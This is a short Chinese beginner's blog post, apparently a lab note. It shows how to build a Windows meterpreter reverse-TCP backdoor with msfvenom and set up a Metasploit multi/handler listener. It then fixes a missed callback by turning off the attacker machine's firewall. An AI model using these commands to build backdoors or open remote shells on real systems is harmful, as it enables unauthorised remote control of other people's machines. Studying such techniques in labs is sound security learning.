【小白学习记】记一次msf反弹shell小错误

使用MSF生成后门程序,反弹shell

设置攻击机IP和端口,生成后门程序

sudo msfvenom -p windows/meterpreter/reverse_tcp lhost=172.24.4.7 lport=4444 -f exe -o attack.exe

设置监听模块

  1. 打开 msfconsole
  2. 使用以下命令设置监听模块
msfconsole 
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 172.24.4.7
set lport 4444
run

在这里插入图片描述

将生成的后门程序上传到目标机上

在这里插入图片描述

运行后门程序

在这里插入图片描述

错误出现

运行后门程序后攻击机没有监听到。
经过排查后,现在是攻击机防火墙导致没有监听到

解决方法

  1. 关闭防火墙
  2. 添加入站规则
    这里笔者直接选择简单粗暴的关闭防火墙(狗头保命)
    成功监听到(不需要关闭目标的防火墙就可以成功)
    在这里插入图片描述

请确保在使用这些技术时,您有权这么做,并且您的行为符合法律法规和道德准则。这些信息仅供教育和研究目的使用。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值